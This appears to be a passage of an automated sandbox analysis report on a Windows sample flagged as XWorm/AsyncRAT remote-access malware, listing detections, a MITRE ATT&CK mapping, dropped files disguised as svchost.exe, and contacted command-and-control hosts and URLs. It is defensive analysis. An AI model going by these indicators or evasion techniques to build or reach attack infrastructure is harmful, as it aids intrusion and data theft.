                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\ALL slumzick.exeCode function: 4_2_00007FF6BA6576D8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF6BA6576D8
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: svchost.exe, 00000003.00000002.2785488992.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2799077131.000000001BEAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: All function.exe PID: 4400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 512, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: All function.exe PID: 4400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 512, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services12
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		21
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		1
                  Obfuscated Files or Information                  		Security Account Manager24
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Registry Run Keys / Startup Folder                  		2
                  Software Packing                  		NTDS541
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials151
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583457 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 59 ip-api.com 2->59 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 19 other signatures 2->77 9 file.exe 4 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        signatures3 process4 file5 49 C:\Users\user\AppData\Roaming\svchost.exe, PE32 9->49 dropped 51 C:\Users\user\AppData\...\All function.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->53 dropped 81 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->81 83 Drops PE files with benign system names 9->83 17 svchost.exe 1 5 9->17         started        21 All function.exe 3 9->21         started        signatures6 process7 dnsIp8 55 45.141.26.134, 54562, 7000 SPECTRAIPSpectraIPBVNL Netherlands 17->55 57 ip-api.com 208.95.112.1, 49702, 80 TUT-ASUS United States 17->57 61 Antivirus detection for dropped file 17->61 63 System process connects to network (likely due to code injection or exploit) 17->63 65 Multi AV Scanner detection for dropped file 17->65 69 7 other signatures 17->69 24 powershell.exe 23 17->24         started        27 powershell.exe 23 17->27         started        29 powershell.exe 17->29         started        35 2 other processes 17->35 47 C:\Users\user\AppData\...\ALL slumzick.exe, PE32+ 21->47 dropped 67 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->67 31 svchost.exe 1 21->31         started        33 ALL slumzick.exe 21->33         started        file9 signatures10 process11 signatures12 79 Loading BitLocker PowerShell Module 24->79 37 conhost.exe 24->37         started        39 conhost.exe 27->39         started        41 conhost.exe 29->41         started        43 conhost.exe 35->43         started        45 conhost.exe 35->45         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  file.exe100%AviraTR/Dropper.Gen
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\All function.exe100%AviraTR/Dropper.Gen
                  C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\ALL slumzick.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\All function.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\ALL slumzick.exe47%ReversingLabsWin64.Trojan.Generic
                  C:\Users\user\AppData\Roaming\All function.exe83%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  C:\Users\user\AppData\Roaming\svchost.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  45.141.26.1340%Avira URL Cloudsafe
                  https://qualityboy.rdcw.xyz/0%Avira URL Cloudsafe
                  https://ion=v4.5alC0%Avira URL Cloudsafe
                  https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad0%Avira URL Cloudsafe
                  http://www.microsu.S0%Avira URL Cloudsafe
                  https://scripts.sil.org/OFLThis0%Avira URL Cloudsafe
                  https://qualityboy.rdcw.xyz/slumzickx0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    45.141.26.134true
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/line/?fields=hostingfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://scripts.sil.org/OFLThisALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                          		high
                          https://ion=v4.5alCpowershell.exe, 00000009.00000002.1798528406.000002239EB4A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://discord.gg/sGNBaJSzYDstartALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                  		high
                                  http://www.microsoft.copowershell.exe, 00000009.00000002.1798379341.000002239EA00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1973377511.000002B033142000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.micpowershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://curl.haxx.se/docs/http-cookies.htmlALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                              		high
                                              http://crl.mpowershell.exe, 0000000E.00000002.1973377511.000002B033102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://qualityboy.rdcw.xyz/ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.microsu.Spowershell.exe, 00000012.00000002.2194708953.0000017F73B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://qualityboy.rdcw.xyz/slumzickxALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
